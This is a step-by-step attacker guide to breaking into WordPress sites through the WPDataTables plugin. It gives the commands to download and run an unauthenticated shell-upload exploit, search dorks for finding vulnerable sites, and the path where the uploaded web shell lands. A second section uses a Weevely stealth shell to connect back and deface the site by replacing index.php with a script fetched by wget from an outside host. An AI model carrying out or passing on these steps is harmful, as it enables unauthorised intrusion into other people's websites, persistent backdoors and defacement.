Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass

Uploading Shell

Requirement:
    1-Python Any Version (v2.7 recommended)
    2-Exploit Script
    3-Backdoor

Steps:
    1- Download Exploit

        wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt

    2- Change to executable Python extension

        mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py

    3- Find Vulnerable Target using dork

        inurl:/plugins/wpdatatables
        inurl:codecanyon-3958969
        index of "wpdatatables"
        index of "codecanyon-3958969"

    4- Open cmd/terminal and run exploit wptable.py

        python wpdatatables_shell_up.py -t targetsite.com -f shell.php

    5- Shell Upload to

        http://targetsite.com/wp-content/YEAR/MONTH/shell.php

Bypassing Not Acceptable

Requirements:
    1- Weevely Stealth Shell
    2- Remote Deface Script (.txt)


Steps:
    1- Upload weevely stealth shell using the exploit script

    2- Backconnect using weevely

    3- CD to root directory

    4- Backup index.php

        mv index.php indexBAK.php

    5- Import Deface Script

        wget http://yourhosting.com/index.txt -O index.php